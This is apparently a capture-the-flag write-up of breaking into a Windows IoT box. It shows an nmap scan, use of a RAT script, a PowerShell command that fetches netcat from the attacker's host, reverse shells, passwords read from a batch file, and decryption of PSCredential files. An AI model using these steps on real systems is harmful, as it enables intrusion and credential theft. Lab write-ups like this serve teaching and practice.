Host is up (0.21s latency).
Not shown: 65529 filtered ports
135/tcp open msrpc Microsoft Windows RPC
5985/tcp open upnp Microsoft IIS httpd
8080/tcp open upnp Microsoft IIS httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
29817/tcp open unknown
29819/tcp open arcserve ARCserve Discovery
29820/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 355.84 seconds
Port 8080

The site asked for credentials, so I tried to google the default password for Windows Device Portal:

User Name: Administrator, password: p@ssw0rd

But the credentials I found on Google didn't work.

Then I came to know that this is an IoT box. I also found a repository on GitHub with a script that acts as a RAT (Remote Access Trojan). I tried running the commands listed in the repository; basically you need to install the hexdump module on Python 2, because the script works with Python 2.

So our RAT is working perfectly!

Now let's try to craft a backdoor to get a reverse shell and start a Metasploit listener. But this didn't work.

Let's try uploading a netcat binary instead, by hosting it on our local machine and fetching it with PowerShell: Invoke-WebRequest -Uri $ip -OutFile $filepath

It did get transferred to the target box, but it looks like this version of netcat is not compatible. I then tried uploading netcat64.exe, and we got a hit.

So let's keep our fingers crossed and hope we get a reverse shell. And we got it :D
Here we can see there are 3 drives and we are in the C drive, whereas in the D drive we can see the app and administrator folders, but we are not able to access them, and the D drive is formatted correctly so we cannot access it.

By using dir /a we can see the hidden folder (although we could have used PowerShell and ls -la, this still gets our job done). When reading the contents of r.bat we can see the two users we suspected. What net user is doing is changing the password of both users; it is also deleting that account in a loop:

net user app mesh5143
net user administrator _1nt3rn37ofTh1nGz
So I think we cannot switch users as we do in Linux, at least I don't know how to do it; I tried googling and pasting the commands but it didn't work, so I assumed these would be the passwords for the Windows Device Portal that we saw in the beginning.

Once I got into the application I looked around at what I could do with it and found where I can run system commands. Now, to see which user we are, I tried running whoami; it failed, but when I ran echo %username% it showed that I'm Administrator, so let's find a way to get a shell from here. We already uploaded nc64.exe to C:\Windows\Temp.
Now we can't really read the contents of user.txt and root.txt because they are stored as a credential object in PowerShell, called a PSCredential object. In order to decrypt user.txt we need to be logged in as the user whose file it is, and for root.txt we need to be an administrator. Since we are Administrator, let's try to decrypt that flag for now and then we will switch to app.

First we create an object from the file in which the credential is stored:

$file = Import-Clixml -Path U:\Users\administrator\root.txt

If this gives no errors, the command ran successfully. Then we use this object to call a function to grab the password.
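To make the mechanism explicit, here is an added PowerShell example (not from the original write-up) that round-trips a PSCredential through Export-Clixml and Import-Clixml and then reads the password back the same way. The file path and the sample user/password are constructed for illustration, not values from the box.

```powershell
# Added example: how a PSCredential saved with Export-Clixml is read back, and why
# only the user who saved it can decrypt it. Path and password below are constructed.

$path = Join-Path $env:TEMP 'demo-cred.xml'   # hypothetical location, not the box's U:\ path

# 1. Build a PSCredential and serialise it. On Windows PowerShell the SecureString is
#    encrypted with DPAPI under the current user's profile before it is written to disk,
#    so the XML on disk does not contain the password in the clear.
$secure = ConvertTo-SecureString 'S3cret-Sample!' -AsPlainText -Force   # constructed sample
$cred   = New-Object System.Management.Automation.PSCredential ('demo-user', $secure)
$cred | Export-Clixml -Path $path

# 2. Read it back. Import-Clixml only succeeds for the same Windows user on the same
#    machine; run as another account it fails with "Key not valid for use in specified state".
try {
    $file = Import-Clixml -Path $path
    # GetNetworkCredential() is the function that exposes the decrypted password as text.
    $plain = $file.GetNetworkCredential().Password
    "User: $($file.UserName)  Password: $plain"
}
catch {
    "Could not decrypt: this file belongs to a different user or machine ($($_.Exception.Message))"
}
finally {
    Remove-Item $path -ErrorAction SilentlyContinue
}
```

The only protection on such a file is the saving user's DPAPI key, so anyone who can run code as that user (which is exactly what the Device Portal's command runner gives us here) can call GetNetworkCredential() and recover the secret. That is why a file exported this way should be treated as sensitive as the plaintext itself, and why it is not a substitute for a proper secret store.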
Now for the app user, I'm going to quickly log in as that user through the Windows Device Portal, run the netcat binary and capture the reverse shell. In order to do that, since there was no logout option on the portal, I had to clear all of the browser's data, then logged in with the password we found for app.

I tried running the nc64.exe binary, but it was giving access denied, so I uploaded the binary to the Public directory in the C drive instead.

And we have a shell as app. And we got the user flag as well.

This link was really helpful for me in decrypting the password, or in this case the flag: https://www.travisgan.com/2015/06/powershell-password-encryption.html